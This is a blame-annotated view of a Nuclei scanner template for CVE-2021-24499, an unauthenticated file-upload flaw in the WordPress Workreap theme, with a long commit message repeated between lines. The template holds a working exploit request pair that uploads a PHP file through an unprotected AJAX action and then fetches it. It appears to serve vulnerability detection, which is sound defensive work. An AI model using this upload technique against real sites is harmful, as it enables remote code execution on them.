nuclei-templates/http/cves/2021/CVE-2021-24499.yaml

63 lines
2.6 KiB
YAML
Raw Normal View History

2021-09-16 01:07:40 +00:00
id: CVE-2021-24499
info:
Dashboard Content Enhancements (#4411) * standardizing enhanced by tag * Fix spacing. Add classification->cve * Enhancement: cves/2021/CVE-2021-20158.yaml by mp * Enhancement: cves/2021/CVE-2021-20167.yaml by mp * Typo * Enhancement: cves/2021/CVE-2021-20837.yaml by mp * Enhancement: cves/2021/CVE-2021-21307.yaml by mp * Enhancement: cves/2021/CVE-2021-21479.yaml by mp * Enhancement: cves/2021/CVE-2021-21881.yaml by mp * Enhancement: cves/2021/CVE-2021-21972.yaml by mp * Enhancement: cves/2021/CVE-2021-21978.yaml by mp * Enhancement: cves/2021/CVE-2021-22005.yaml by mp * Enhancement: cves/2021/CVE-2021-22205.yaml by mp * Enhancement: cves/2021/CVE-2021-22986.yaml by mp * Enhancement: cves/2021/CVE-2021-24285.yaml by mp * Enhancement: cves/2021/CVE-2021-24472.yaml by mp * Enhancement: cves/2021/CVE-2021-20090.yaml by mp * Enhancement: cves/2021/CVE-2021-20167.yaml by mp * Enhancement: cves/2021/CVE-2021-21307.yaml by mp * Enhancement: cves/2021/CVE-2021-21978.yaml by mp * Enhancement: cves/2021/CVE-2021-21985.yaml by mp * Enhancement: cves/2021/CVE-2021-21972.yaml by mp * Enhancement: cves/2021/CVE-2021-22205.yaml by mp * Enhancement: cves/2021/CVE-2021-22986.yaml by mp * Enhancement: cves/2021/CVE-2021-24285.yaml by mp * Restore empty lines * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Remove unnecessary file * Restore content after bad dashboard edit * Enhancement: undefined by cs * Spacing issues * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Delete null file created by dashboard * Remove improper Enhanced tag * Spacing issues * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Remove test dashboard commits * Enhancement: cves/2014/CVE-2014-9618.yaml by mp * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Not really enhanced * Add classification->cve-id * Restore content from dashboard mess up * Enhancement: cves/2014/CVE-2014-9618.yaml by mp * Enhancement: cves/2014/CVE-2014-9618.yaml by mp * Restore newlines * Enhancement: cves/2007/CVE-2007-4556.yaml by mp * Enhancement: cves/2007/CVE-2007-4556.yaml by mp * Enhancement: cves/2014/CVE-2014-9618.yaml by mp * Enhancement: cves/2015/CVE-2015-1427.yaml by mp * Enhancement: cves/2015/CVE-2015-3224.yaml by mp * Enhancement: cves/2015/CVE-2015-7450.yaml by mp * Enhancement: cves/2016/CVE-2016-10134.yaml by mp * Enhancement: cves/2016/CVE-2016-1555.yaml by mp * Enhancement: cves/2016/CVE-2016-2004.yaml by mp * Enhancement: cves/2016/CVE-2016-5649.yaml by mp * Enhancement: cves/2016/CVE-2016-7552.yaml by mp * Enhancement: cves/2017/CVE-2017-1000486.yaml by mp * Enhancement: cves/2017/CVE-2017-11444.yaml by mp * Spacing issues * Added better reference * Enhancement: cves/2017/CVE-2017-12149.yaml by mp * Enhancement: cves/2017/CVE-2017-12542.yaml by mp * Enhancement: cves/2017/CVE-2017-12611.yaml by mp * Enhancement: cves/2017/CVE-2017-12635.yaml by mp * Enhancement: cves/2017/CVE-2017-14135.yaml by mp * Enhancement: cves/2017/CVE-2017-3881.yaml by mp * Enhancement: cves/2017/CVE-2017-7269.yaml by mp * Enhancement: cves/2017/CVE-2017-8917.yaml by mp * Enhancement: cves/2017/CVE-2017-9791.yaml by mp * Enhancement: cves/2015/CVE-2015-1427.yaml by mp * Enhancement: cves/2017/CVE-2017-12149.yaml by mp * Enhancement: cves/2017/CVE-2017-12542.yaml by mp * Enhancement: cves/2017/CVE-2017-8917.yaml by mp * Spacing and other minor issues * Update CVE-2015-1427.yaml * Update CVE-2017-12149.yaml * Update CVE-2017-12542.yaml * Update CVE-2017-12635.yaml * Update CVE-2017-14135.yaml * Update CVE-2017-3881.yaml * Update CVE-2017-7269.yaml * Update CVE-2017-8917.yaml * Update CVE-2017-9791.yaml * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by mp * Enhancement: cnvd/2019/CNVD-2019-32204.yaml by mp * Enhancement: cnvd/2020/CNVD-2020-68596.yaml by mp * Enhancement: cnvd/2021/CNVD-2021-09650.yaml by mp * Enhancement: cnvd/2021/CNVD-2021-26422.yaml by mp * Enhancement: cnvd/2022/CNVD-2022-03672.yaml by mp * Enhancement: cves/2017/CVE-2017-9841.yaml by mp * Enhancement: cves/2018/CVE-2018-0127.yaml by mp * Enhancement: cves/2018/CVE-2018-1000226.yaml by mp * Enhancement: cves/2018/CVE-2018-1000861.yaml by mp * Enhancement: cves/2018/CVE-2018-10562.yaml by mp * Enhancement: cves/2018/CVE-2018-12031.yaml by mp * Enhancement: cves/2018/CVE-2018-1207.yaml by mp * Enhancement: cves/2018/CVE-2018-12634.yaml by mp * Enhancement: cves/2018/CVE-2018-1273.yaml by mp * Enhancement: cves/2018/CVE-2018-16763.yaml by mp * Enhancement: cves/2018/CVE-2018-16167.yaml by mp * Enhancement: cves/2018/CVE-2018-14916.yaml by mp * Enhancement: cves/2018/CVE-2018-14064.yaml by mp * Enhancement: cves/2018/CVE-2018-13379.yaml by mp * Enhancement: cves/2017/CVE-2017-9841.yaml by mp * Enhancement: cves/2018/CVE-2018-1000861.yaml by mp * Enhancement: cves/2018/CVE-2018-10562.yaml by mp * Enhancement: cves/2018/CVE-2018-12031.yaml by mp * Enhancement: cves/2018/CVE-2018-1207.yaml by mp * Enhancement: cves/2018/CVE-2018-12634.yaml by mp * Enhancement: cves/2018/CVE-2018-13379.yaml by mp * Enhancement: cves/2018/CVE-2018-14916.yaml by mp * Enhancement: cves/2018/CVE-2018-16167.yaml by mp * Enhancement: cves/2018/CVE-2018-16763.yaml by mp * Cleanup and spacing * Remove blank cve-id lines * Enhancement: cves/2018/CVE-2018-16836.yaml by mp * Enhancement: cves/2018/CVE-2018-17246.yaml by mp * Enhancement: cves/2018/CVE-2018-17431.yaml by mp * Enhancement: cves/2018/CVE-2018-18925.yaml by mp * Enhancement: cves/2018/CVE-2018-20985.yaml by mp * Enhancement: cves/2018/CVE-2018-2894.yaml by mp * Enhancement: cves/2018/CVE-2018-3810.yaml by mp * Enhancement: cves/2018/CVE-2018-7600.yaml by mp * Enhancement: cves/2018/CVE-2018-7600.yaml by mp * Enhancement: cves/2018/CVE-2018-7602.yaml by mp * Enhancement: cves/2018/CVE-2018-9161.yaml by mp * Enhancement: cves/2018/CVE-2018-16836.yaml by mp * Enhancement: cves/2018/CVE-2018-17431.yaml by mp * Many title clean-ups for more standardization. Some vendor name clean-up * Enhancement: cves/2018/CVE-2018-20985.yaml by mp * Enhancement: cves/2018/CVE-2018-3810.yaml by mp * Spacing issues * Remove 2 blank newlines * Enhancement: vulnerabilities/other/tamronos-rce.yaml by cs * Enhancement: cves/2018/CVE-2018-9845.yaml by mp * Enhancement: cves/2018/CVE-2018-9995.yaml by mp * Enhancement: cves/2019/CVE-2019-0230.yaml by mp * Enhancement: cves/2019/CVE-2019-16920.yaml by mp * Enhancement: cves/2019/CVE-2019-17270.yaml by mp * Enhancement: cves/2019/CVE-2019-17382.yaml by mp * Enhancement: cves/2019/CVE-2019-17444.yaml by mp * Enhancement: cves/2019/CVE-2019-17506.yaml by mp * Enhancement: cves/2020/CVE-2020-10148.yaml by mp * Enhancement: cves/2020/CVE-2020-11710.yaml by mp * Enhancement: cves/2020/CVE-2020-11854.yaml by mp * Enhancement: cves/2020/CVE-2020-12800.yaml by mp * Enhancement: cves/2020/CVE-2020-13117.yaml by mp * Enhancement: cves/2020/CVE-2020-13167.yaml by mp * Enhancement: cves/2020/CVE-2020-13927.yaml by mp * Enhancement: cves/2020/CVE-2020-13942.yaml by mp * Spacing, syntax error * Spacing, correct this time. * Enhancement: cves/2020/CVE-2020-15920.yaml by mp * Enhancement: cves/2020/CVE-2020-29227.yaml by mp * Enhancement: cves/2021/CVE-2021-24499.yaml by mp * Enhancement: cves/2021/CVE-2021-24762.yaml by mp * Enhancement: cves/2018/CVE-2018-9995.yaml by mp * Enhancement: cves/2019/CVE-2019-0230.yaml by mp * Enhancement: cves/2019/CVE-2019-17444.yaml by mp * Enhancement: cves/2020/CVE-2020-10148.yaml by mp * Enhancement: cves/2020/CVE-2020-11854.yaml by mp * Enhancement: cves/2020/CVE-2020-13167.yaml by mp * Enhancement: cves/2020/CVE-2020-13927.yaml by mp * Enhancement: cves/2020/CVE-2020-15920.yaml by mp * Enhancement: cves/2021/CVE-2021-24499.yaml by mp * Extra newlines and one sp;acing issue * Update CVE-2018-9995.yaml * Update CVE-2019-0230.yaml * Update CVE-2019-16920.yaml * Update CVE-2019-17270.yaml * Update CVE-2019-17382.yaml * Update CVE-2019-17444.yaml * Update CVE-2019-17506.yaml * Update CVE-2020-10148.yaml * Update CVE-2020-11710.yaml * Update CVE-2020-11854.yaml * Update CVE-2020-12800.yaml * Update CVE-2020-13167.yaml * Update CVE-2020-13927.yaml * Update CVE-2020-13942.yaml * Update CVE-2020-15920.yaml * Update CVE-2020-29227.yaml * Update CVE-2021-24499.yaml * Update CVE-2021-24762.yaml Co-authored-by: sullo <sullo@cirt.net> Co-authored-by: Prince Chaddha <prince@projectdiscovery.io>
2022-05-17 09:11:26 +00:00
name: WordPress Workreap - Remote Code Execution
2021-09-16 01:07:40 +00:00
author: daffainfo
severity: critical
Dashboard Content Enhancements (#4411) * standardizing enhanced by tag * Fix spacing. Add classification->cve * Enhancement: cves/2021/CVE-2021-20158.yaml by mp * Enhancement: cves/2021/CVE-2021-20167.yaml by mp * Typo * Enhancement: cves/2021/CVE-2021-20837.yaml by mp * Enhancement: cves/2021/CVE-2021-21307.yaml by mp * Enhancement: cves/2021/CVE-2021-21479.yaml by mp * Enhancement: cves/2021/CVE-2021-21881.yaml by mp * Enhancement: cves/2021/CVE-2021-21972.yaml by mp * Enhancement: cves/2021/CVE-2021-21978.yaml by mp * Enhancement: cves/2021/CVE-2021-22005.yaml by mp * Enhancement: cves/2021/CVE-2021-22205.yaml by mp * Enhancement: cves/2021/CVE-2021-22986.yaml by mp * Enhancement: cves/2021/CVE-2021-24285.yaml by mp * Enhancement: cves/2021/CVE-2021-24472.yaml by mp * Enhancement: cves/2021/CVE-2021-20090.yaml by mp * Enhancement: cves/2021/CVE-2021-20167.yaml by mp * Enhancement: cves/2021/CVE-2021-21307.yaml by mp * Enhancement: cves/2021/CVE-2021-21978.yaml by mp * Enhancement: cves/2021/CVE-2021-21985.yaml by mp * Enhancement: cves/2021/CVE-2021-21972.yaml by mp * Enhancement: cves/2021/CVE-2021-22205.yaml by mp * Enhancement: cves/2021/CVE-2021-22986.yaml by mp * Enhancement: cves/2021/CVE-2021-24285.yaml by mp * Restore empty lines * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Remove unnecessary file * Restore content after bad dashboard edit * Enhancement: undefined by cs * Spacing issues * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Delete null file created by dashboard * Remove improper Enhanced tag * Spacing issues * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Remove test dashboard commits * Enhancement: cves/2014/CVE-2014-9618.yaml by mp * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Not really enhanced * Add classification->cve-id * Restore content from dashboard mess up * Enhancement: cves/2014/CVE-2014-9618.yaml by mp * Enhancement: cves/2014/CVE-2014-9618.yaml by mp * Restore newlines * Enhancement: cves/2007/CVE-2007-4556.yaml by mp * Enhancement: cves/2007/CVE-2007-4556.yaml by mp * Enhancement: cves/2014/CVE-2014-9618.yaml by mp * Enhancement: cves/2015/CVE-2015-1427.yaml by mp * Enhancement: cves/2015/CVE-2015-3224.yaml by mp * Enhancement: cves/2015/CVE-2015-7450.yaml by mp * Enhancement: cves/2016/CVE-2016-10134.yaml by mp * Enhancement: cves/2016/CVE-2016-1555.yaml by mp * Enhancement: cves/2016/CVE-2016-2004.yaml by mp * Enhancement: cves/2016/CVE-2016-5649.yaml by mp * Enhancement: cves/2016/CVE-2016-7552.yaml by mp * Enhancement: cves/2017/CVE-2017-1000486.yaml by mp * Enhancement: cves/2017/CVE-2017-11444.yaml by mp * Spacing issues * Added better reference * Enhancement: cves/2017/CVE-2017-12149.yaml by mp * Enhancement: cves/2017/CVE-2017-12542.yaml by mp * Enhancement: cves/2017/CVE-2017-12611.yaml by mp * Enhancement: cves/2017/CVE-2017-12635.yaml by mp * Enhancement: cves/2017/CVE-2017-14135.yaml by mp * Enhancement: cves/2017/CVE-2017-3881.yaml by mp * Enhancement: cves/2017/CVE-2017-7269.yaml by mp * Enhancement: cves/2017/CVE-2017-8917.yaml by mp * Enhancement: cves/2017/CVE-2017-9791.yaml by mp * Enhancement: cves/2015/CVE-2015-1427.yaml by mp * Enhancement: cves/2017/CVE-2017-12149.yaml by mp * Enhancement: cves/2017/CVE-2017-12542.yaml by mp * Enhancement: cves/2017/CVE-2017-8917.yaml by mp * Spacing and other minor issues * Update CVE-2015-1427.yaml * Update CVE-2017-12149.yaml * Update CVE-2017-12542.yaml * Update CVE-2017-12635.yaml * Update CVE-2017-14135.yaml * Update CVE-2017-3881.yaml * Update CVE-2017-7269.yaml * Update CVE-2017-8917.yaml * Update CVE-2017-9791.yaml * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by mp * Enhancement: cnvd/2019/CNVD-2019-32204.yaml by mp * Enhancement: cnvd/2020/CNVD-2020-68596.yaml by mp * Enhancement: cnvd/2021/CNVD-2021-09650.yaml by mp * Enhancement: cnvd/2021/CNVD-2021-26422.yaml by mp * Enhancement: cnvd/2022/CNVD-2022-03672.yaml by mp * Enhancement: cves/2017/CVE-2017-9841.yaml by mp * Enhancement: cves/2018/CVE-2018-0127.yaml by mp * Enhancement: cves/2018/CVE-2018-1000226.yaml by mp * Enhancement: cves/2018/CVE-2018-1000861.yaml by mp * Enhancement: cves/2018/CVE-2018-10562.yaml by mp * Enhancement: cves/2018/CVE-2018-12031.yaml by mp * Enhancement: cves/2018/CVE-2018-1207.yaml by mp * Enhancement: cves/2018/CVE-2018-12634.yaml by mp * Enhancement: cves/2018/CVE-2018-1273.yaml by mp * Enhancement: cves/2018/CVE-2018-16763.yaml by mp * Enhancement: cves/2018/CVE-2018-16167.yaml by mp * Enhancement: cves/2018/CVE-2018-14916.yaml by mp * Enhancement: cves/2018/CVE-2018-14064.yaml by mp * Enhancement: cves/2018/CVE-2018-13379.yaml by mp * Enhancement: cves/2017/CVE-2017-9841.yaml by mp * Enhancement: cves/2018/CVE-2018-1000861.yaml by mp * Enhancement: cves/2018/CVE-2018-10562.yaml by mp * Enhancement: cves/2018/CVE-2018-12031.yaml by mp * Enhancement: cves/2018/CVE-2018-1207.yaml by mp * Enhancement: cves/2018/CVE-2018-12634.yaml by mp * Enhancement: cves/2018/CVE-2018-13379.yaml by mp * Enhancement: cves/2018/CVE-2018-14916.yaml by mp * Enhancement: cves/2018/CVE-2018-16167.yaml by mp * Enhancement: cves/2018/CVE-2018-16763.yaml by mp * Cleanup and spacing * Remove blank cve-id lines * Enhancement: cves/2018/CVE-2018-16836.yaml by mp * Enhancement: cves/2018/CVE-2018-17246.yaml by mp * Enhancement: cves/2018/CVE-2018-17431.yaml by mp * Enhancement: cves/2018/CVE-2018-18925.yaml by mp * Enhancement: cves/2018/CVE-2018-20985.yaml by mp * Enhancement: cves/2018/CVE-2018-2894.yaml by mp * Enhancement: cves/2018/CVE-2018-3810.yaml by mp * Enhancement: cves/2018/CVE-2018-7600.yaml by mp * Enhancement: cves/2018/CVE-2018-7600.yaml by mp * Enhancement: cves/2018/CVE-2018-7602.yaml by mp * Enhancement: cves/2018/CVE-2018-9161.yaml by mp * Enhancement: cves/2018/CVE-2018-16836.yaml by mp * Enhancement: cves/2018/CVE-2018-17431.yaml by mp * Many title clean-ups for more standardization. Some vendor name clean-up * Enhancement: cves/2018/CVE-2018-20985.yaml by mp * Enhancement: cves/2018/CVE-2018-3810.yaml by mp * Spacing issues * Remove 2 blank newlines * Enhancement: vulnerabilities/other/tamronos-rce.yaml by cs * Enhancement: cves/2018/CVE-2018-9845.yaml by mp * Enhancement: cves/2018/CVE-2018-9995.yaml by mp * Enhancement: cves/2019/CVE-2019-0230.yaml by mp * Enhancement: cves/2019/CVE-2019-16920.yaml by mp * Enhancement: cves/2019/CVE-2019-17270.yaml by mp * Enhancement: cves/2019/CVE-2019-17382.yaml by mp * Enhancement: cves/2019/CVE-2019-17444.yaml by mp * Enhancement: cves/2019/CVE-2019-17506.yaml by mp * Enhancement: cves/2020/CVE-2020-10148.yaml by mp * Enhancement: cves/2020/CVE-2020-11710.yaml by mp * Enhancement: cves/2020/CVE-2020-11854.yaml by mp * Enhancement: cves/2020/CVE-2020-12800.yaml by mp * Enhancement: cves/2020/CVE-2020-13117.yaml by mp * Enhancement: cves/2020/CVE-2020-13167.yaml by mp * Enhancement: cves/2020/CVE-2020-13927.yaml by mp * Enhancement: cves/2020/CVE-2020-13942.yaml by mp * Spacing, syntax error * Spacing, correct this time. * Enhancement: cves/2020/CVE-2020-15920.yaml by mp * Enhancement: cves/2020/CVE-2020-29227.yaml by mp * Enhancement: cves/2021/CVE-2021-24499.yaml by mp * Enhancement: cves/2021/CVE-2021-24762.yaml by mp * Enhancement: cves/2018/CVE-2018-9995.yaml by mp * Enhancement: cves/2019/CVE-2019-0230.yaml by mp * Enhancement: cves/2019/CVE-2019-17444.yaml by mp * Enhancement: cves/2020/CVE-2020-10148.yaml by mp * Enhancement: cves/2020/CVE-2020-11854.yaml by mp * Enhancement: cves/2020/CVE-2020-13167.yaml by mp * Enhancement: cves/2020/CVE-2020-13927.yaml by mp * Enhancement: cves/2020/CVE-2020-15920.yaml by mp * Enhancement: cves/2021/CVE-2021-24499.yaml by mp * Extra newlines and one sp;acing issue * Update CVE-2018-9995.yaml * Update CVE-2019-0230.yaml * Update CVE-2019-16920.yaml * Update CVE-2019-17270.yaml * Update CVE-2019-17382.yaml * Update CVE-2019-17444.yaml * Update CVE-2019-17506.yaml * Update CVE-2020-10148.yaml * Update CVE-2020-11710.yaml * Update CVE-2020-11854.yaml * Update CVE-2020-12800.yaml * Update CVE-2020-13167.yaml * Update CVE-2020-13927.yaml * Update CVE-2020-13942.yaml * Update CVE-2020-15920.yaml * Update CVE-2020-29227.yaml * Update CVE-2021-24499.yaml * Update CVE-2021-24762.yaml Co-authored-by: sullo <sullo@cirt.net> Co-authored-by: Prince Chaddha <prince@projectdiscovery.io>
2022-05-17 09:11:26 +00:00
description: WordPress Workreap theme is susceptible to remote code execution. The AJAX actions workreap_award_temp_file_uploader and workreap_temp_file_uploader did not perform nonce checks, or validate that the request is from a valid user in any other way. The endpoints allowed for uploading arbitrary files to the uploads/workreap-temp directory. Uploaded files were neither sanitized nor validated, allowing an unauthenticated visitor to upload executable code such as php scripts.
2023-09-06 12:09:01 +00:00
remediation: |
Update to the latest version of the Workreap plugin to fix the vulnerability.
2021-09-16 17:12:22 +00:00
reference:
- https://github.com/RyouYoo/CVE-2021-24499
- https://nvd.nist.gov/vuln/detail/CVE-2021-24499
- https://wpscan.com/vulnerability/74611d5f-afba-42ae-bc19-777cdf2808cb
- https://jetpack.com/2021/07/07/multiple-vulnerabilities-in-workreap-theme/
2023-07-11 19:49:27 +00:00
- http://packetstormsecurity.com/files/172876/WordPress-Workreap-2.2.2-Shell-Upload.html
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-24499
cwe-id: CWE-434
epss-score: 0.18031
epss-percentile: 0.95651
2023-09-06 12:09:01 +00:00
cpe: cpe:2.3:a:amentotech:workreap:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 2
2023-07-11 19:49:27 +00:00
vendor: amentotech
product: workreap
2023-09-06 12:09:01 +00:00
framework: wordpress
2023-07-12 11:56:50 +00:00
tags: wpscan,packetstorm,cve,cve2021,rce,workreap,wordpress,wp-plugin,intrusive,wp
2021-09-16 01:07:40 +00:00
http:
2021-09-16 01:07:40 +00:00
- raw:
- |
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=------------------------cd0dc6bdc00b1cf9
X-Requested-With: XMLHttpRequest
-----------------------------cd0dc6bdc00b1cf9
Content-Disposition: form-data; name="action"
workreap_award_temp_file_uploader
-----------------------------cd0dc6bdc00b1cf9
2021-09-17 13:08:19 +00:00
Content-Disposition: form-data; name="award_img"; filename="{{randstr}}.php"
2021-09-16 01:07:40 +00:00
Content-Type: application/x-httpd-php
2021-09-16 17:12:22 +00:00
<?php echo md5("CVE-2021-24499"); ?>
2021-09-16 01:07:40 +00:00
-----------------------------cd0dc6bdc00b1cf9--
- |
2021-09-17 13:08:19 +00:00
GET /wp-content/uploads/workreap-temp/{{randstr}}.php HTTP/1.1
2021-09-16 01:07:40 +00:00
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
2021-09-16 17:12:22 +00:00
- "71abe5077dae2754c36d731cc1534d4d"
Dashboard Content Enhancements (#4411) * standardizing enhanced by tag * Fix spacing. Add classification->cve * Enhancement: cves/2021/CVE-2021-20158.yaml by mp * Enhancement: cves/2021/CVE-2021-20167.yaml by mp * Typo * Enhancement: cves/2021/CVE-2021-20837.yaml by mp * Enhancement: cves/2021/CVE-2021-21307.yaml by mp * Enhancement: cves/2021/CVE-2021-21479.yaml by mp * Enhancement: cves/2021/CVE-2021-21881.yaml by mp * Enhancement: cves/2021/CVE-2021-21972.yaml by mp * Enhancement: cves/2021/CVE-2021-21978.yaml by mp * Enhancement: cves/2021/CVE-2021-22005.yaml by mp * Enhancement: cves/2021/CVE-2021-22205.yaml by mp * Enhancement: cves/2021/CVE-2021-22986.yaml by mp * Enhancement: cves/2021/CVE-2021-24285.yaml by mp * Enhancement: cves/2021/CVE-2021-24472.yaml by mp * Enhancement: cves/2021/CVE-2021-20090.yaml by mp * Enhancement: cves/2021/CVE-2021-20167.yaml by mp * Enhancement: cves/2021/CVE-2021-21307.yaml by mp * Enhancement: cves/2021/CVE-2021-21978.yaml by mp * Enhancement: cves/2021/CVE-2021-21985.yaml by mp * Enhancement: cves/2021/CVE-2021-21972.yaml by mp * Enhancement: cves/2021/CVE-2021-22205.yaml by mp * Enhancement: cves/2021/CVE-2021-22986.yaml by mp * Enhancement: cves/2021/CVE-2021-24285.yaml by mp * Restore empty lines * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: vulnerabilities/other/3cx-management-console.yaml by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Remove unnecessary file * Restore content after bad dashboard edit * Enhancement: undefined by cs * Spacing issues * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: undefined by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Delete null file created by dashboard * Remove improper Enhanced tag * Spacing issues * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Remove test dashboard commits * Enhancement: cves/2014/CVE-2014-9618.yaml by mp * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Enhancement: cnvd/2019/CNVD-2019-19299.yaml by cs * Not really enhanced * Add classification->cve-id * Restore content from dashboard mess up * Enhancement: cves/2014/CVE-2014-9618.yaml by mp * Enhancement: cves/2014/CVE-2014-9618.yaml by mp * Restore newlines * Enhancement: cves/2007/CVE-2007-4556.yaml by mp * Enhancement: cves/2007/CVE-2007-4556.yaml by mp * Enhancement: cves/2014/CVE-2014-9618.yaml by mp * Enhancement: cves/2015/CVE-2015-1427.yaml by mp * Enhancement: 